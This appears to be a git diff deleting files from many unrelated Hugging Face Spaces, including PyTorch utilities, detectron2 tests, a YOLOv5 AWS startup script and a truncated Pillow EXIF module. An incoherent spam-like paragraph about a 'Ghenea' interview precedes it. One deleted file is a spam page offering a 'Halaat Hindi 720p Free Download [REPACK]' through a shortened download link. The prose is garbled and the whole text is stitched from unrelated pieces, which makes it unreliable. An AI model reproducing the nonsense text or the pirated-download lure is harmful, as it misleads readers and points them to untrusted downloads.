Ghenea maintains that the expansion of the sector of education has failed. - -The interview with Ghenea is addressed to journalists and researchers, many questions were addressed to me by them. The interview was recorded in a series of about ten hours and published later on the IBT Media website. All the content is made public in their original form. Marius Ghenea has done his military service in the Italian army. Then he moved to Italy where he started his business career in carte antreprenoriat. - -I am a computer engineer, a teacher and a writer. I read 4fefd39f24
    -
    -
    -

    diff --git a/spaces/bioriAsaeru/text-to-voice/Halaat Hindi 720p Free Download [REPACK].md b/spaces/bioriAsaeru/text-to-voice/Halaat Hindi 720p Free Download [REPACK].md deleted file mode 100644 index 5f3c14ea39490478a86baa334693483bd99d7303..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Halaat Hindi 720p Free Download [REPACK].md +++ /dev/null @@ -1,6 +0,0 @@ -

    Halaat Hindi 720p Free Download


    Download Zip ––– https://urloso.com/2uyR56



    -
    - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/birsardar/stable-diffusion-mat-outpainting-primer/torch_utils/misc.py b/spaces/birsardar/stable-diffusion-mat-outpainting-primer/torch_utils/misc.py deleted file mode 100644 index d447829a091d94e56b2984e801de74b4c9ec5d19..0000000000000000000000000000000000000000 --- a/spaces/birsardar/stable-diffusion-mat-outpainting-primer/torch_utils/misc.py +++ /dev/null @@ -1,268 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -import re -import contextlib -import numpy as np -import torch -import warnings -import dnnlib - -#---------------------------------------------------------------------------- -# Cached construction of constant tensors. Avoids CPU=>GPU copy when the -# same constant is used multiple times. - -_constant_cache = dict() - -def constant(value, shape=None, dtype=None, device=None, memory_format=None): - value = np.asarray(value) - if shape is not None: - shape = tuple(shape) - if dtype is None: - dtype = torch.get_default_dtype() - if device is None: - device = torch.device('cpu') - if memory_format is None: - memory_format = torch.contiguous_format - - key = (value.shape, value.dtype, value.tobytes(), shape, dtype, device, memory_format) - tensor = _constant_cache.get(key, None) - if tensor is None: - tensor = torch.as_tensor(value.copy(), dtype=dtype, device=device) - if shape is not None: - tensor, _ = torch.broadcast_tensors(tensor, torch.empty(shape)) - tensor = tensor.contiguous(memory_format=memory_format) - _constant_cache[key] = tensor - return tensor - -#---------------------------------------------------------------------------- -# Replace NaN/Inf with specified numerical values. - -try: - nan_to_num = torch.nan_to_num # 1.8.0a0 -except AttributeError: - def nan_to_num(input, nan=0.0, posinf=None, neginf=None, *, out=None): # pylint: disable=redefined-builtin - assert isinstance(input, torch.Tensor) - if posinf is None: - posinf = torch.finfo(input.dtype).max - if neginf is None: - neginf = torch.finfo(input.dtype).min - assert nan == 0 - return torch.clamp(input.unsqueeze(0).nansum(0), min=neginf, max=posinf, out=out) - -#---------------------------------------------------------------------------- -# Symbolic assert. - -try: - symbolic_assert = torch._assert # 1.8.0a0 # pylint: disable=protected-access -except AttributeError: - symbolic_assert = torch.Assert # 1.7.0 - -#---------------------------------------------------------------------------- -# Context manager to suppress known warnings in torch.jit.trace(). - -class suppress_tracer_warnings(warnings.catch_warnings): - def __enter__(self): - super().__enter__() - warnings.simplefilter('ignore', category=torch.jit.TracerWarning) - return self - -#---------------------------------------------------------------------------- -# Assert that the shape of a tensor matches the given list of integers. -# None indicates that the size of a dimension is allowed to vary. -# Performs symbolic assertion when used in torch.jit.trace(). - -def assert_shape(tensor, ref_shape): - if tensor.ndim != len(ref_shape): - raise AssertionError(f'Wrong number of dimensions: got {tensor.ndim}, expected {len(ref_shape)}') - for idx, (size, ref_size) in enumerate(zip(tensor.shape, ref_shape)): - if ref_size is None: - pass - elif isinstance(ref_size, torch.Tensor): - with suppress_tracer_warnings(): # as_tensor results are registered as constants - symbolic_assert(torch.equal(torch.as_tensor(size), ref_size), f'Wrong size for dimension {idx}') - elif isinstance(size, torch.Tensor): - with suppress_tracer_warnings(): # as_tensor results are registered as constants - symbolic_assert(torch.equal(size, torch.as_tensor(ref_size)), f'Wrong size for dimension {idx}: expected {ref_size}') - elif size != ref_size: - raise AssertionError(f'Wrong size for dimension {idx}: got {size}, expected {ref_size}') - -#---------------------------------------------------------------------------- -# Function decorator that calls torch.autograd.profiler.record_function(). - -def profiled_function(fn): - def decorator(*args, **kwargs): - with torch.autograd.profiler.record_function(fn.__name__): - return fn(*args, **kwargs) - decorator.__name__ = fn.__name__ - return decorator - -#---------------------------------------------------------------------------- -# Sampler for torch.utils.data.DataLoader that loops over the dataset -# indefinitely, shuffling items as it goes. - -class InfiniteSampler(torch.utils.data.Sampler): - def __init__(self, dataset, rank=0, num_replicas=1, shuffle=True, seed=0, window_size=0.5): - assert len(dataset) > 0 - assert num_replicas > 0 - assert 0 <= rank < num_replicas - assert 0 <= window_size <= 1 - super().__init__(dataset) - self.dataset = dataset - self.rank = rank - self.num_replicas = num_replicas - self.shuffle = shuffle - self.seed = seed - self.window_size = window_size - - def __iter__(self): - order = np.arange(len(self.dataset)) - rnd = None - window = 0 - if self.shuffle: - rnd = np.random.RandomState(self.seed) - rnd.shuffle(order) - window = int(np.rint(order.size * self.window_size)) - - idx = 0 - while True: - i = idx % order.size - if idx % self.num_replicas == self.rank: - yield order[i] - if window >= 2: - j = (i - rnd.randint(window)) % order.size - order[i], order[j] = order[j], order[i] - idx += 1 - -#---------------------------------------------------------------------------- -# Utilities for operating with torch.nn.Module parameters and buffers. - -def params_and_buffers(module): - assert isinstance(module, torch.nn.Module) - return list(module.parameters()) + list(module.buffers()) - -def named_params_and_buffers(module): - assert isinstance(module, torch.nn.Module) - return list(module.named_parameters()) + list(module.named_buffers()) - -def copy_params_and_buffers(src_module, dst_module, require_all=False): - assert isinstance(src_module, torch.nn.Module) - assert isinstance(dst_module, torch.nn.Module) - src_tensors = {name: tensor for name, tensor in named_params_and_buffers(src_module)} - for name, tensor in named_params_and_buffers(dst_module): - assert (name in src_tensors) or (not require_all) - if name in src_tensors: - tensor.copy_(src_tensors[name].detach()).requires_grad_(tensor.requires_grad) - -#---------------------------------------------------------------------------- -# Context manager for easily enabling/disabling DistributedDataParallel -# synchronization. - -@contextlib.contextmanager -def ddp_sync(module, sync): - assert isinstance(module, torch.nn.Module) - if sync or not isinstance(module, torch.nn.parallel.DistributedDataParallel): - yield - else: - with module.no_sync(): - yield - -#---------------------------------------------------------------------------- -# Check DistributedDataParallel consistency across processes. - -def check_ddp_consistency(module, ignore_regex=None): - assert isinstance(module, torch.nn.Module) - for name, tensor in named_params_and_buffers(module): - fullname = type(module).__name__ + '.' + name - flag = False - if ignore_regex is not None: - for regex in ignore_regex: - if re.fullmatch(regex, fullname): - flag = True - break - if flag: - continue - tensor = tensor.detach() - other = tensor.clone() - torch.distributed.broadcast(tensor=other, src=0) - assert (nan_to_num(tensor) == nan_to_num(other)).all(), fullname - -#---------------------------------------------------------------------------- -# Print summary table of module hierarchy. - -def print_module_summary(module, inputs, max_nesting=3, skip_redundant=True): - assert isinstance(module, torch.nn.Module) - assert not isinstance(module, torch.jit.ScriptModule) - assert isinstance(inputs, (tuple, list)) - - # Register hooks. - entries = [] - nesting = [0] - def pre_hook(_mod, _inputs): - nesting[0] += 1 - def post_hook(mod, _inputs, outputs): - nesting[0] -= 1 - if nesting[0] <= max_nesting: - outputs = list(outputs) if isinstance(outputs, (tuple, list)) else [outputs] - outputs = [t for t in outputs if isinstance(t, torch.Tensor)] - entries.append(dnnlib.EasyDict(mod=mod, outputs=outputs)) - hooks = [mod.register_forward_pre_hook(pre_hook) for mod in module.modules()] - hooks += [mod.register_forward_hook(post_hook) for mod in module.modules()] - - # Run module. - outputs = module(*inputs) - for hook in hooks: - hook.remove() - - # Identify unique outputs, parameters, and buffers. - tensors_seen = set() - for e in entries: - e.unique_params = [t for t in e.mod.parameters() if id(t) not in tensors_seen] - e.unique_buffers = [t for t in e.mod.buffers() if id(t) not in tensors_seen] - e.unique_outputs = [t for t in e.outputs if id(t) not in tensors_seen] - tensors_seen |= {id(t) for t in e.unique_params + e.unique_buffers + e.unique_outputs} - - # Filter out redundant entries. - if skip_redundant: - entries = [e for e in entries if len(e.unique_params) or len(e.unique_buffers) or len(e.unique_outputs)] - - # Construct table. - rows = [[type(module).__name__, 'Parameters', 'Buffers', 'Output shape', 'Datatype']] - rows += [['---'] * len(rows[0])] - param_total = 0 - buffer_total = 0 - submodule_names = {mod: name for name, mod in module.named_modules()} - for e in entries: - name = '' if e.mod is module else submodule_names[e.mod] - param_size = sum(t.numel() for t in e.unique_params) - buffer_size = sum(t.numel() for t in e.unique_buffers) - output_shapes = [str(list(e.outputs[0].shape)) for t in e.outputs] - output_dtypes = [str(t.dtype).split('.')[-1] for t in e.outputs] - rows += [[ - name + (':0' if len(e.outputs) >= 2 else ''), - str(param_size) if param_size else '-', - str(buffer_size) if buffer_size else '-', - (output_shapes + ['-'])[0], - (output_dtypes + ['-'])[0], - ]] - for idx in range(1, len(e.outputs)): - rows += [[name + f':{idx}', '-', '-', output_shapes[idx], output_dtypes[idx]]] - param_total += param_size - buffer_total += buffer_size - rows += [['---'] * len(rows[0])] - rows += [['Total', str(param_total), str(buffer_total), '-', '-']] - - # Print table. - widths = [max(len(cell) for cell in column) for column in zip(*rows)] - print() - for row in rows: - print(' '.join(cell + ' ' * (width - len(cell)) for cell, width in zip(row, widths))) - print() - return outputs - -#---------------------------------------------------------------------------- diff --git a/spaces/breadlicker45/the-jam-machine-app/load.py b/spaces/breadlicker45/the-jam-machine-app/load.py deleted file mode 100644 index bacdf11654a512ff191903dadfc31ca257467929..0000000000000000000000000000000000000000 --- a/spaces/breadlicker45/the-jam-machine-app/load.py +++ /dev/null @@ -1,63 +0,0 @@ -from transformers import GPT2LMHeadModel -from transformers import PreTrainedTokenizerFast -import os -import torch - - -class LoadModel: - """ - Example usage: - - # if loading model and tokenizer from Huggingface - model_repo = "misnaej/the-jam-machine-wdtef6l" - model, tokenizer = LoadModel( - model_repo, from_huggingface=True - ).load_model_and_tokenizer() - - # if loading model and tokenizer from a local folder - model_path = "models/model_2048_wholedataset" - model, tokenizer = LoadModel( - model_path, from_huggingface=False - ).load_model_and_tokenizer() - - """ - - def __init__(self, path, from_huggingface=True, device="cpu", revision=None): - # path is either a relative path on a local/remote machine or a model repo on HuggingFace - if not from_huggingface: - if not os.path.exists(path): - print(path) - raise Exception("Model path does not exist") - self.from_huggingface = from_huggingface - self.path = path - self.device = device - self.revision = revision - if torch.cuda.is_available(): - self.device = "cuda" - - def load_model_and_tokenizer(self): - model = self.load_model() - tokenizer = self.load_tokenizer() - - return model, tokenizer - - def load_model(self): - if self.revision is None: - model = GPT2LMHeadModel.from_pretrained(self.path) # .to(self.device) - else: - model = GPT2LMHeadModel.from_pretrained( - self.path, revision=self.revision - ) # .to(self.device) - - return model - - def load_tokenizer(self): - if self.from_huggingface: - pass - else: - if not os.path.exists(f"{self.path}/tokenizer.json"): - raise Exception( - f"There is no 'tokenizer.json'file in the defined {self.path}" - ) - tokenizer = PreTrainedTokenizerFast.from_pretrained(self.path) - return tokenizer diff --git a/spaces/brjathu/HMR2.0/vendor/detectron2/detectron2/evaluation/testing.py b/spaces/brjathu/HMR2.0/vendor/detectron2/detectron2/evaluation/testing.py deleted file mode 100644 index 9e5ae625bb0593fc20739dd3ea549157e4df4f3d..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/detectron2/detectron2/evaluation/testing.py +++ /dev/null @@ -1,85 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging -import numpy as np -import pprint -import sys -from collections.abc import Mapping - - -def print_csv_format(results): - """ - Print main metrics in a format similar to Detectron, - so that they are easy to copypaste into a spreadsheet. - - Args: - results (OrderedDict[dict]): task_name -> {metric -> score} - unordered dict can also be printed, but in arbitrary order - """ - assert isinstance(results, Mapping) or not len(results), results - logger = logging.getLogger(__name__) - for task, res in results.items(): - if isinstance(res, Mapping): - # Don't print "AP-category" metrics since they are usually not tracked. - important_res = [(k, v) for k, v in res.items() if "-" not in k] - logger.info("copypaste: Task: {}".format(task)) - logger.info("copypaste: " + ",".join([k[0] for k in important_res])) - logger.info("copypaste: " + ",".join(["{0:.4f}".format(k[1]) for k in important_res])) - else: - logger.info(f"copypaste: {task}={res}") - - -def verify_results(cfg, results): - """ - Args: - results (OrderedDict[dict]): task_name -> {metric -> score} - - Returns: - bool: whether the verification succeeds or not - """ - expected_results = cfg.TEST.EXPECTED_RESULTS - if not len(expected_results): - return True - - ok = True - for task, metric, expected, tolerance in expected_results: - actual = results[task].get(metric, None) - if actual is None: - ok = False - continue - if not np.isfinite(actual): - ok = False - continue - diff = abs(actual - expected) - if diff > tolerance: - ok = False - - logger = logging.getLogger(__name__) - if not ok: - logger.error("Result verification failed!") - logger.error("Expected Results: " + str(expected_results)) - logger.error("Actual Results: " + pprint.pformat(results)) - - sys.exit(1) - else: - logger.info("Results verification passed.") - return ok - - -def flatten_results_dict(results): - """ - Expand a hierarchical dict of scalars into a flat dict of scalars. - If results[k1][k2][k3] = v, the returned dict will have the entry - {"k1/k2/k3": v}. - - Args: - results (dict): - """ - r = {} - for k, v in results.items(): - if isinstance(v, Mapping): - v = flatten_results_dict(v) - for kk, vv in v.items(): - r[k + "/" + kk] = vv - else: - r[k] = v - return r diff --git a/spaces/brjathu/HMR2.0/vendor/detectron2/tests/structures/test_instances.py b/spaces/brjathu/HMR2.0/vendor/detectron2/tests/structures/test_instances.py deleted file mode 100644 index a352f74313ae9b2b7a42398f0ef4606fcb4a610c..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/detectron2/tests/structures/test_instances.py +++ /dev/null @@ -1,219 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import unittest -import torch -from torch import Tensor - -from detectron2.export.torchscript import patch_instances -from detectron2.structures import Boxes, Instances -from detectron2.utils.testing import convert_scripted_instances - - -class TestInstances(unittest.TestCase): - def test_int_indexing(self): - attr1 = torch.tensor([[0.0, 0.0, 1.0], [0.0, 0.0, 0.5], [0.0, 0.0, 1.0], [0.0, 0.5, 0.5]]) - attr2 = torch.tensor([0.1, 0.2, 0.3, 0.4]) - instances = Instances((100, 100)) - instances.attr1 = attr1 - instances.attr2 = attr2 - for i in range(-len(instances), len(instances)): - inst = instances[i] - self.assertEqual((inst.attr1 == attr1[i]).all(), True) - self.assertEqual((inst.attr2 == attr2[i]).all(), True) - - self.assertRaises(IndexError, lambda: instances[len(instances)]) - self.assertRaises(IndexError, lambda: instances[-len(instances) - 1]) - - def test_script_new_fields(self): - def get_mask(x: Instances) -> torch.Tensor: - return x.mask - - class f(torch.nn.Module): - def forward(self, x: Instances): - proposal_boxes = x.proposal_boxes # noqa F841 - objectness_logits = x.objectness_logits # noqa F841 - return x - - class g(torch.nn.Module): - def forward(self, x: Instances): - return get_mask(x) - - class g2(torch.nn.Module): - def __init__(self): - super().__init__() - self.g = g() - - def forward(self, x: Instances): - proposal_boxes = x.proposal_boxes # noqa F841 - return x, self.g(x) - - fields = {"proposal_boxes": Boxes, "objectness_logits": Tensor} - with patch_instances(fields): - torch.jit.script(f()) - - # can't script anymore after exiting the context - with self.assertRaises(Exception): - # will create a ConcreteType for g - torch.jit.script(g2()) - - new_fields = {"mask": Tensor} - with patch_instances(new_fields): - # will compile g with a different Instances; this should pass - torch.jit.script(g()) - with self.assertRaises(Exception): - torch.jit.script(g2()) - - new_fields = {"mask": Tensor, "proposal_boxes": Boxes} - with patch_instances(new_fields) as NewInstances: - # get_mask will be compiled with a different Instances; this should pass - scripted_g2 = torch.jit.script(g2()) - x = NewInstances((3, 4)) - x.mask = torch.rand(3) - x.proposal_boxes = Boxes(torch.rand(3, 4)) - scripted_g2(x) # it should accept the new Instances object and run successfully - - def test_script_access_fields(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - proposal_boxes = x.proposal_boxes - objectness_logits = x.objectness_logits - return proposal_boxes.tensor + objectness_logits - - fields = {"proposal_boxes": Boxes, "objectness_logits": Tensor} - with patch_instances(fields): - torch.jit.script(f()) - - def test_script_len(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - return len(x) - - class g(torch.nn.Module): - def forward(self, x: Instances): - return len(x) - - image_shape = (15, 15) - - fields = {"proposal_boxes": Boxes} - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - x = new_instance(image_shape) - with self.assertRaises(Exception): - script_module(x) - box_tensors = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]) - x.proposal_boxes = Boxes(box_tensors) - length = script_module(x) - self.assertEqual(length, 2) - - fields = {"objectness_logits": Tensor} - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(g()) - x = new_instance(image_shape) - objectness_logits = torch.tensor([1.0]).reshape(1, 1) - x.objectness_logits = objectness_logits - length = script_module(x) - self.assertEqual(length, 1) - - def test_script_has(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - return x.has("proposal_boxes") - - image_shape = (15, 15) - fields = {"proposal_boxes": Boxes} - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - x = new_instance(image_shape) - self.assertFalse(script_module(x)) - - box_tensors = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]) - x.proposal_boxes = Boxes(box_tensors) - self.assertTrue(script_module(x)) - - def test_script_to(self): - class f(torch.nn.Module): - def forward(self, x: Instances): - return x.to(torch.device("cpu")) - - image_shape = (15, 15) - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - x = new_instance(image_shape) - script_module(x) - - box_tensors = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]) - x.proposal_boxes = Boxes(box_tensors) - x.a = box_tensors - script_module(x) - - def test_script_getitem(self): - class f(torch.nn.Module): - def forward(self, x: Instances, idx): - return x[idx] - - image_shape = (15, 15) - fields = {"proposal_boxes": Boxes, "a": Tensor} - inst = Instances(image_shape) - inst.proposal_boxes = Boxes(torch.rand(4, 4)) - inst.a = torch.rand(4, 10) - idx = torch.tensor([True, False, True, False]) - with patch_instances(fields) as new_instance: - script_module = torch.jit.script(f()) - - out = f()(inst, idx) - out_scripted = script_module(new_instance.from_instances(inst), idx) - self.assertTrue( - torch.equal(out.proposal_boxes.tensor, out_scripted.proposal_boxes.tensor) - ) - self.assertTrue(torch.equal(out.a, out_scripted.a)) - - def test_from_to_instances(self): - orig = Instances((30, 30)) - orig.proposal_boxes = Boxes(torch.rand(3, 4)) - - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields) as NewInstances: - # convert to NewInstances and back - new1 = NewInstances.from_instances(orig) - new2 = convert_scripted_instances(new1) - self.assertTrue(torch.equal(orig.proposal_boxes.tensor, new1.proposal_boxes.tensor)) - self.assertTrue(torch.equal(orig.proposal_boxes.tensor, new2.proposal_boxes.tensor)) - - def test_script_init_args(self): - def f(x: Tensor): - image_shape = (15, 15) - # __init__ can take arguments - inst = Instances(image_shape, a=x, proposal_boxes=Boxes(x)) - inst2 = Instances(image_shape, a=x) - return inst.a, inst2.a - - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields): - script_f = torch.jit.script(f) - x = torch.randn(3, 4) - outputs = script_f(x) - self.assertTrue(torch.equal(outputs[0], x)) - self.assertTrue(torch.equal(outputs[1], x)) - - def test_script_cat(self): - def f(x: Tensor): - image_shape = (15, 15) - # __init__ can take arguments - inst = Instances(image_shape, a=x) - inst2 = Instances(image_shape, a=x) - - inst3 = Instances(image_shape, proposal_boxes=Boxes(x)) - return inst.cat([inst, inst2]), inst3.cat([inst3, inst3]) - - fields = {"proposal_boxes": Boxes, "a": Tensor} - with patch_instances(fields): - script_f = torch.jit.script(f) - x = torch.randn(3, 4) - output, output2 = script_f(x) - self.assertTrue(torch.equal(output.a, torch.cat([x, x]))) - self.assertFalse(output.has("proposal_boxes")) - self.assertTrue(torch.equal(output2.proposal_boxes.tensor, torch.cat([x, x]))) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/bulentsofttech/gradio_s1000_veri_toplama_modeli/yolov5/utils/aws/userdata.sh b/spaces/bulentsofttech/gradio_s1000_veri_toplama_modeli/yolov5/utils/aws/userdata.sh deleted file mode 100644 index 5fc1332ac1b0d1794cf8f8c5f6918059ae5dc381..0000000000000000000000000000000000000000 --- a/spaces/bulentsofttech/gradio_s1000_veri_toplama_modeli/yolov5/utils/aws/userdata.sh +++ /dev/null @@ -1,27 +0,0 @@ -#!/bin/bash -# AWS EC2 instance startup script https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html -# This script will run only once on first instance start (for a re-start script see mime.sh) -# /home/ubuntu (ubuntu) or /home/ec2-user (amazon-linux) is working dir -# Use >300 GB SSD - -cd home/ubuntu -if [ ! -d yolov5 ]; then - echo "Running first-time script." # install dependencies, download COCO, pull Docker - git clone https://github.com/ultralytics/yolov5 -b master && sudo chmod -R 777 yolov5 - cd yolov5 - bash data/scripts/get_coco.sh && echo "COCO done." & - sudo docker pull ultralytics/yolov5:latest && echo "Docker done." & - python -m pip install --upgrade pip && pip install -r requirements.txt && python detect.py && echo "Requirements done." & - wait && echo "All tasks done." # finish background tasks -else - echo "Running re-start script." # resume interrupted runs - i=0 - list=$(sudo docker ps -qa) # container list i.e. $'one\ntwo\nthree\nfour' - while IFS= read -r id; do - ((i++)) - echo "restarting container $i: $id" - sudo docker start $id - # sudo docker exec -it $id python train.py --resume # single-GPU - sudo docker exec -d $id python utils/aws/resume.py # multi-scenario - done <<<"$list" -fi diff --git a/spaces/bunnyg20081061/world2/README.md b/spaces/bunnyg20081061/world2/README.md deleted file mode 100644 index ed67cd9d26b168ca63c3e2b957e7a56024c12ccb..0000000000000000000000000000000000000000 --- a/spaces/bunnyg20081061/world2/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: World2 -emoji: 📉 -colorFrom: red -colorTo: indigo -sdk: gradio -sdk_version: 3.12.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/detectron2/utils/tracing.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/detectron2/utils/tracing.py deleted file mode 100644 index 577df4e2f4ad0a1a309d31d7c28311be11f87247..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/detectron2/utils/tracing.py +++ /dev/null @@ -1,71 +0,0 @@ -import inspect -import torch - -from detectron2.utils.env import TORCH_VERSION - -try: - from torch.fx._symbolic_trace import is_fx_tracing as is_fx_tracing_current - - tracing_current_exists = True -except ImportError: - tracing_current_exists = False - -try: - from torch.fx._symbolic_trace import _orig_module_call - - tracing_legacy_exists = True -except ImportError: - tracing_legacy_exists = False - - -@torch.jit.ignore -def is_fx_tracing_legacy() -> bool: - """ - Returns a bool indicating whether torch.fx is currently symbolically tracing a module. - Can be useful for gating module logic that is incompatible with symbolic tracing. - """ - return torch.nn.Module.__call__ is not _orig_module_call - - -@torch.jit.ignore -def is_fx_tracing() -> bool: - """Returns whether execution is currently in - Torch FX tracing mode""" - if TORCH_VERSION >= (1, 10) and tracing_current_exists: - return is_fx_tracing_current() - elif tracing_legacy_exists: - return is_fx_tracing_legacy() - else: - # Can't find either current or legacy tracing indication code. - # Enabling this assert_fx_safe() call regardless of tracing status. - return False - - -@torch.jit.ignore -def assert_fx_safe(condition: bool, message: str) -> torch.Tensor: - """An FX-tracing safe version of assert. - Avoids erroneous type assertion triggering when types are masked inside - an fx.proxy.Proxy object during tracing. - Args: condition - either a boolean expression or a string representing - the condition to test. If this assert triggers an exception when tracing - due to dynamic control flow, try encasing the expression in quotation - marks and supplying it as a string.""" - # Must return a concrete tensor for compatibility with PyTorch <=1.8. - # If <=1.8 compatibility is not needed, return type can be converted to None - if not is_fx_tracing(): - try: - if isinstance(condition, str): - caller_frame = inspect.currentframe().f_back - torch._assert( - eval(condition, caller_frame.f_globals, caller_frame.f_locals), message - ) - return torch.ones(1) - else: - torch._assert(condition, message) - return torch.ones(1) - except torch.fx.proxy.TraceError as e: - print( - "Found a non-FX compatible assertion. Skipping the check. Failure is shown below" - + str(e) - ) - return torch.zeros(1) diff --git a/spaces/chinhon/News_Summarizer/README.md b/spaces/chinhon/News_Summarizer/README.md deleted file mode 100644 index f9fc62087ed2ddb151fc18ee2154afd69a7c6af8..0000000000000000000000000000000000000000 --- a/spaces/chinhon/News_Summarizer/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: News_Summarizer -emoji: 🐨 -colorFrom: indigo -colorTo: gray -sdk: gradio -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/PIL/ExifTags.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/PIL/ExifTags.py deleted file mode 100644 index 2347c6d4c2768b6c946a386bba9f1325ed91193f..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/PIL/ExifTags.py +++ /dev/null @@ -1,380 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# EXIF tags -# -# Copyright (c) 2003 by Secret Labs AB -# -# See the README file for information on usage and redistribution. -# - -""" -This module provides constants and clear-text names for various -well-known EXIF tags. -""" - -from enum import IntEnum - - -class Base(IntEnum): - # possibly incomplete - InteropIndex = 0x0001 - ProcessingSoftware = 0x000B - NewSubfileType = 0x00FE - SubfileType = 0x00FF - ImageWidth = 0x0100 - ImageLength = 0x0101 - BitsPerSample = 0x0102 - Compression = 0x0103 - PhotometricInterpretation = 0x0106 - Thresholding = 0x0107 - CellWidth = 0x0108 - CellLength = 0x0109 - FillOrder = 0x010A - DocumentName = 0x010D - ImageDescription = 0x010E - Make = 0x010F - Model = 0x0110 - StripOffsets = 0x0111 - Orientation = 0x0112 - SamplesPerPixel = 0x0115 - RowsPerStrip = 0x0116 - StripByteCounts = 0x0117 - MinSampleValue = 0x0118 - MaxSampleValue = 0x0119 - XResolution = 0x011A - YResolution = 0x011B - PlanarConfiguration = 0x011C - PageName = 0x011D - FreeOffsets = 0x0120 - FreeByteCounts = 0x0121 - GrayResponseUnit = 0x0122 - GrayResponseCurve = 0x0123 - T4Options = 0x0124 - T6Options = 0x0125 - ResolutionUnit = 0x0128 - PageNumber = 0x0129 - TransferFunction = 0x012D - Software = 0x0131 - DateTime = 0x0132 - Artist = 0x013B - HostComputer = 0x013C - Predictor = 0x013D - WhitePoint = 0x013E - PrimaryChromaticities = 0x013F - ColorMap = 0x0140 - HalftoneHints = 0x0141 - TileWidth = 0x0142 - TileLength = 0x0143 - TileOffsets = 0x0144 - TileByteCounts = 0x0145 - SubIFDs = 0x014A - InkSet = 0x014C - InkNames = 0x014D - NumberOfInks = 0x014E - DotRange = 0x0150 - TargetPrinter = 0x0151 - ExtraSamples = 0x0152 - SampleFormat = 0x0153 - SMinSampleValue = 0x0154 - SMaxSampleValue = 0x0155 - TransferRange = 0x0156 - ClipPath = 0x0157 - XClipPathUnits = 0x0158 - YClipPathUnits = 0x0159 - Indexed = 0x015A - JPEGTables = 0x015B - OPIProxy = 0x015F - JPEGProc = 0x0200 - JpegIFOffset = 0x0201 - JpegIFByteCount = 0x0202 - JpegRestartInterval = 0x0203 - JpegLosslessPredictors = 0x0205 - JpegPointTransforms = 0x0206 - JpegQTables = 0x0207 - JpegDCTables = 0x0208 - JpegACTables = 0x0209 - YCbCrCoefficients = 0x0211 - YCbCrSubSampling = 0x0212 - YCbCrPositioning = 0x0213 - ReferenceBlackWhite = 0x0214 - XMLPacket = 0x02BC - RelatedImageFileFormat = 0x1000 - RelatedImageWidth = 0x1001 - RelatedImageLength = 0x1002 - Rating = 0x4746 - RatingPercent = 0x4749 - ImageID = 0x800D - CFARepeatPatternDim = 0x828D - BatteryLevel = 0x828F - Copyright = 0x8298 - ExposureTime = 0x829A - FNumber = 0x829D - IPTCNAA = 0x83BB - ImageResources = 0x8649 - ExifOffset = 0x8769 - InterColorProfile = 0x8773 - ExposureProgram = 0x8822 - SpectralSensitivity = 0x8824 - GPSInfo = 0x8825 - ISOSpeedRatings = 0x8827 - OECF = 0x8828 - Interlace = 0x8829 - TimeZoneOffset = 0x882A - SelfTimerMode = 0x882B - SensitivityType = 0x8830 - StandardOutputSensitivity = 0x8831 - RecommendedExposureIndex = 0x8832 - ISOSpeed = 0x8833 - ISOSpeedLatitudeyyy = 0x8834 - ISOSpeedLatitudezzz = 0x8835 - ExifVersion = 0x9000 - DateTimeOriginal = 0x9003 - DateTimeDigitized = 0x9004 - OffsetTime = 0x9010 - OffsetTimeOriginal = 0x9011 - OffsetTimeDigitized = 0x9012 - ComponentsConfiguration = 0x9101 - CompressedBitsPerPixel = 0x9102 - ShutterSpeedValue = 0x9201 - ApertureValue = 0x9202 - BrightnessValue = 0x9203 - ExposureBiasValue = 0x9204 - 